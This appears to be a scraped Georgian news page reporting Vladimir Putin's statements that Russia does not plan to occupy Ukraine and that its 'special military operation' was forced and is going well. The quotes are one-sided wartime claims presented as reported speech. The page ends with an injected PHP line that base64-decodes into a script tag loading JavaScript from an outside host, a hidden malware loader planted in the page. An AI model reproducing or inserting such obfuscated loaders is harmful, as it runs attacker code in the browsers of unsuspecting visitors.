celsiusi
ავერსი საქკაბელი
რუსეთის პრეზიდენტის ვლადიმერ პუტინის განცხადებით, რუსეთი უკრაინის ოკუპაციას არ აპირებს.
 
„კიევთან და უკრაინის სხვა ქალაქებთან რუსეთის ჯარების გამოჩენა დაკავშირებული არ არის ამ ქვეყნის ოკუპაციასთან. ჩვენ ასეთი მიზანი არ გვაქვს“, - განაცხადა პუტინმა.
 
უკრაინაში შეჭრაზე საუბრისას, მან ხაზი გაუსვა, რომ მისი შეფასებით, ვითარების დიპლომატიური გზით დარეგულირების შესაძლებლობა სრულიად იყო ამოწურული.
 
„ჩვენ უბრალოდ, სხვა ვარიანტი არ დაგვიტოვეს, რომ მშვიდობიანი გზით მოგვეგვარებინა ეს პრობლემა, რომელიც ჩვენს გამო არ წარმოშობილა. ამასთან დაკავშირებით, ჩვენ უბრალოდ იძულებული ვიყავით დაგვეწყო სპეციალური სამხედრო ოპერაცია“, - განაცხადა რუსეთის ლიდერმა.
 
მანვე აღნიშნა, რომ რუსეთის შეიარაღებული ძალების ტაქტიკამ ამ ომით სრულიად გაამართლა.
 
„რაც შეეხება საბრძოლო მოქმედებების ტაქტიკას, რომელიც რუსეთის თავდაცვის სამინისტრომ შეიმუშავა გენერალურ შტაბთან ერთად, მან სრულიად გაამართლა. ჩვენი ბიჭები, ჯარისკაცები და ოფიცრები ავლენენ მამაცობას და გმირობას. ყველაფერს აკეთებენ, რაც მათზეა დამოკიდებული, რათა უკრაინის ქალაქების მშვიდობიან მოსახლეობაში მსხვერპლი აირიდონ“ , - აღნიშნა პუტინმა.
 
მისივე თქმით, დონბასში ომის დაწყებისას კიევის ხელისუფლებას სხვადასხვა არხებით უაზრო სისხლისღვრის თავიდან აცილებისთვის შესთავაზეს არ ჩაბმულიყო საბრძოლო მოქმედებებში, არამედ უბრალოდ, თავისი ჯარი გაეყვანა დონბასიდან.
 
„არ ისურვეს! რას იზამ, ეს მათი გადაწყვეტილებაა. იმის გააზრება, თუ რა ხდება რეალურად მიწაზე, მოვა აუცილებლად“, - განაცხადა პუტინმა.
964
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");